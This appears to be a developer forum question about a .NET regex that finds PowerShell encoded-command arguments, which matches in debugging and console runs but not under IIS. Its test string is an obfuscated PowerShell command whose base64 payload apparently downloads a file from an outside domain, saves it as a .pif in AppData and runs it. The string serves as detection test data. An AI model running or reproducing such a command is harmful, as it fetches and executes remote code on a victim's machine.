# A very complicated Regex or IIS issue

Tags: regex, asp.net-core, iis

I've been stuck in ridiculous situation as follow;

Dev Env: .net core 6.0.3 in VS 2022

Project Type: AspNet Core WebApi

Regex Pattern:

```
string pattern = @"(\-enc|\-ec|\-encodedCommand)\s+(?<base64>(?<x>[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4}))";
```

Source String:

```
POwershElL -ex ByPaSS -NOp -w 1 -Ec IAAgAEkAUgBNACAACQAtAFUAcgBJACAAKAAdIGgAdAB0AHAAOgAvAC8AaABvAG0AaQAtAGUAZwB5AHAAdAAuAGMAbwBtAC8AHSAgACAAKwAgAB0gcwB5AHMAdABlAG0ALwA4ADUAcgAdICAAIAArACAAHSBtAB0gIAAgACsAIAAdIHMALgBqAHAAZwAdICAAKQAgAAkALQBvAFUAdABmAGkAbABFACAACQAdICQARQBuAHYAOgBBAHAAcABEAEEAVABBAFwAdABlAHMAdAA4ADUAaQAuAHAAaQBmAB0gIAAJADsAIABpAG4AVgBvAEsARQAtAEkAdABFAG0AIAAgAB0gJABlAG4AVgA6AEEAUABQAEQAYQB0AEEAXAB0AGUAcwB0ADgANQBpAC4AcABpAGYAHSA=
```

Regex snippets:

```
var regexMatches = new Regex(pattern, RegexOptions.IgnoreCase);
var matches = regexMatches.Matches(srcString);
```

- Platform 1: Dev Environment -> VS Debug -> Regex Matches OK
- Platform 2: Prod Env - command prompt -> dotnet test.dll - Regex
  Matches OK
- Platform 3: Prod Env - IIS Host -> **Regex No Match!!!**

As you can see above the regex code is work on Platforms 1 and 2 but not on IIS.
My attempts so far:

- Some globalization settings changes on IIS
- Regional settings changes on OS (Win 2019 Standart)
- IIS service reinstall
- net core packages reinstall

In summary, no matter what I tried, I could not get a regex match on IIS :| I will be grateful if you share your comments.

Comment: Do you mean when your project is deployed to iis, the regular expression doesn't work? If so, did you get any error messages?

Comment: No any error or exception, just no match after execute of regex.matches method on the iis host.

Comment: It is difficult to reproduce your problem based on your description, I suggest you open a case via: https://support.microsoft.com.